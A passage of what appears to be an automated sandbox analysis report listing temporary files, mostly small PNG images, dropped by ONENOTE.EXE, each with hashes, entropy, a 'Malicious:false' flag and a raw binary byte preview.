                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{3B006268-4F20-4F19-810C-DADEEAA3E299}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{3CA02AFB-77D0-4C3B-92DC-245BF5F17631}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{432557E4-5C2A-41EA-AA7A-382204F15FEA}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{449AC1D8-F45D-4B62-8DC0-6F40F2E50B1C}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{46616767-977E-42AB-B0B1-8AEE433B6C08}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{471CE17F-0430-467E-95F3-76C0472C29D8}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{4794BA14-E4AB-44F9-B58D-D0C3260606FF}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4744
                                                                                                                                                                                                          Entropy (8bit):0.6431669927931156
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:RaQW7FYyfB3h1RRXUnfLfXThlXBoOHKOBN802/8IBRujlw//0lweI/K98IjRujd:RaQW7FYyf9/UfL7hzoOpuedWf/KeV
                                                                                                                                                                                                          MD5:0F66F73D015D4FCF000A95716C69C51F
                                                                                                                                                                                                          SHA1:EF739488AB03A2AE0F4A12DB4FEAB4D1F2875EF3
                                                                                                                                                                                                          SHA-256:7BA091F2C9BD4BE28DC7226A48410EDD2ED2F97169E5C21E4F4B26BE7C341D5A
                                                                                                                                                                                                          SHA-512:8C42B672B7AAA2AC23A0EB7C3C65F78AFC3BBFFB1468AB4E8EDE1E5DCD7416F897E239A523FF6D251F965E2CC27B0CEBF0CF10D043BA61EB543844C439D64322
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:./.C..vL....W"v_r......K.......................?.....I...............................................................................................................h.............................................c..DoH.c....G........dQ.r...M..EQI...............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{48A1BA7C-2C96-47DF-8C6A-E886741A4682}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{4A937F4E-73E0-45B2-8A94-4D15BB9D1BE3}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{4AA3BDE8-0D32-4E22-8C0E-6B0DBF0DA806}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{4CA35991-9EA5-486C-B291-3100416ACBBD}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{4CF1C9F2-68F0-4BE4-ACA3-2010D0E918B2}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
